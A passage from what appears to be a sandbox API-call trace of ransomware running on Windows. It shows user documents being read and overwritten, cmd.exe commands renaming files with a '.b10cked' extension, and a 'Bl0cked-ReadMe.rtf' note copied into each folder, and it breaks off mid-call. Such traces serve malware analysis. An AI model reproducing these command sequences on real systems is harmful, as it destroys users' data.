lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3899 [0229.498] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d81 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d81 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.500] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ebf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.500] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ebf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.508] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7871, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ec2 [0229.508] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ebf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.508] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7871, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ec2 [0229.508] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ebf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g ol7OxwE18leXod.csv", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0229.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g ol7OxwE18leXod.csv", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g ol7OxwE18leXod.csv", lpUsedDefaultChar=0x0) returned 20 [0229.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d81 [0229.513] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.514] CloseHandle (hObject=0x1b4) returned 1 [0229.515] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\g ol7OxwE18leXod.csv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV") returned 0x48 [0229.516] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0229.517] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9e0, dwThreadId=0x938)) returned 1 [0229.551] CloseHandle (hObject=0x120) returned 1 [0229.551] CloseHandle (hObject=0x1b4) returned 1 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0229.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0229.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0229.551] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0229.551] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0229.552] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0229.552] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.552] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9b8, dwThreadId=0x370)) returned 1 [0229.691] CloseHandle (hObject=0x120) returned 1 [0229.691] CloseHandle (hObject=0x1b4) returned 1 [0229.691] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0229.691] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.691] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0229.692] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\RIbq701A98461 y-C _\\iyDSdIsdd3hcv.pptx" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\iydsdisdd3hcv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.692] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28648163925) returned 1 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14331 [0229.694] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14819 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.695] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14819 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.696] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa40b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa40b, lpOverlapped=0x0) returned 1 [0229.696] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.696] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa40b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa40b, lpOverlapped=0x0) returned 1 [0229.697] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-41995, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa40e [0229.697] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa40b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa40b, lpOverlapped=0x0) returned 1 [0229.697] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-41995, 